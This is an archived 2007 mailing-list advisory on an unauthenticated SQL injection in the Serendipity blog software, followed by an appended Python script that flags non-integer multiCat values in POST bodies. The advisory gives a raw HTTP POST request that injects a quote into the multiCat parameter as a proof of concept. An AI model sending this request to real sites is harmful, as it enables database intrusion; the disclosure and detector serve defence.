WebApp Sec mailing list archives
Serendipity unauthenticated SQL-Injection
From: SaMuschie <samuschie () yahoo de>
Date: Thu, 1 Mar 2007 17:55:13 +0100 (CET)
+--------------------------------------- - -- -
| SaMuschie Research Labs proudly presents . . .
+------------------------------------------- -- - -
| Application: serendipity
| Version: 1.1.1 (others not tested)
| Vuln./Exploit Type: SQL-Injection
| Status: 0day
+----------------------------------------- -- - -
| Discovered by: Samenspender
| Released: 20070301
| SaMuschie Release Number: 4
+------------------------------- - -- -

POST /serendipity/index.php?frontpage HTTP/1.0
User-Agent: Mozilla/5.0 (SaMuschie)
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Content-Type: application/x-www-form-urlencoded
Content-Length: 67
Connection: close

serendipity%5BmultiCat%5D%5B%5D='&serendipity%5BisMultiCat%5D=Go%21

+----------------------------- -- -
| Lameness Disclaimer
+------------------------------------- - -- - -
| SaMuschie Research Labs was found to publish
| vulnerabilities within well known software products,
| which are easy to discover and exploit.
|
| SaMuschie researchers just spend a minimum of time
| and knowledge for each vulnerability. Hence readers of
| this advisory are requested not to ask any questions
| to the researchers.... they don't know the answer ;)
+---------------------------------- - -- - -
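Added example, not part of the original advisory and not Serendipity code: a defender-side check that scans urlencoded POST bodies for serendipity[multiCat] values that are not plain integers, such as the single quote in the request above. It assumes multiCat is meant to carry numeric category IDs, which the advisory does not state; the request IDs and all sample bodies except req-2 are constructed.

```python
import re
from urllib.parse import parse_qsl

# Assumption (not stated in the advisory): multiCat values are numeric category IDs.
# The optional index lets the pattern match both "[]" and "[0]" style keys.
MULTICAT_KEY = re.compile(r"^serendipity\[multiCat\](\[[^\]]*\])?$")


def suspicious_multicat_values(body: str) -> list[str]:
    """Return multiCat values from a urlencoded POST body that are not plain integers."""
    flagged = []
    # parse_qsl percent-decodes keys and values, so %5B/%5D become [ and ].
    for key, value in parse_qsl(body):
        if MULTICAT_KEY.match(key) and not (value.isascii() and value.isdigit()):
            flagged.append(value)
    return flagged


def scan(requests: list[tuple[str, str]]) -> list[tuple[str, list[str]]]:
    """Given (request_id, body) pairs, return those with suspicious multiCat values."""
    hits = []
    for request_id, body in requests:
        bad = suspicious_multicat_values(body)
        if bad:
            hits.append((request_id, bad))
    return hits


# Constructed sample input: req-2 is the body from the advisory, the rest are made up.
SAMPLE = [
    ("req-1", "serendipity%5BmultiCat%5D%5B%5D=3&serendipity%5BmultiCat%5D%5B%5D=12"
              "&serendipity%5BisMultiCat%5D=Go%21"),
    ("req-2", "serendipity%5BmultiCat%5D%5B%5D='&serendipity%5BisMultiCat%5D=Go%21"),
    ("req-3", "serendipity%5BmultiCat%5D%5B0%5D=7x&serendipity%5BisMultiCat%5D=Go%21"),
    ("req-4", "serendipity%5Bcomment%5D=it's+fine"),  # quote in an unrelated field
]

if __name__ == "__main__":
    for request_id, bad in scan(SAMPLE):
        print(request_id, bad)
```

A check like this belongs in log review or a request filter; it complements, and does not replace, integer casting or parameterized queries in the application itself.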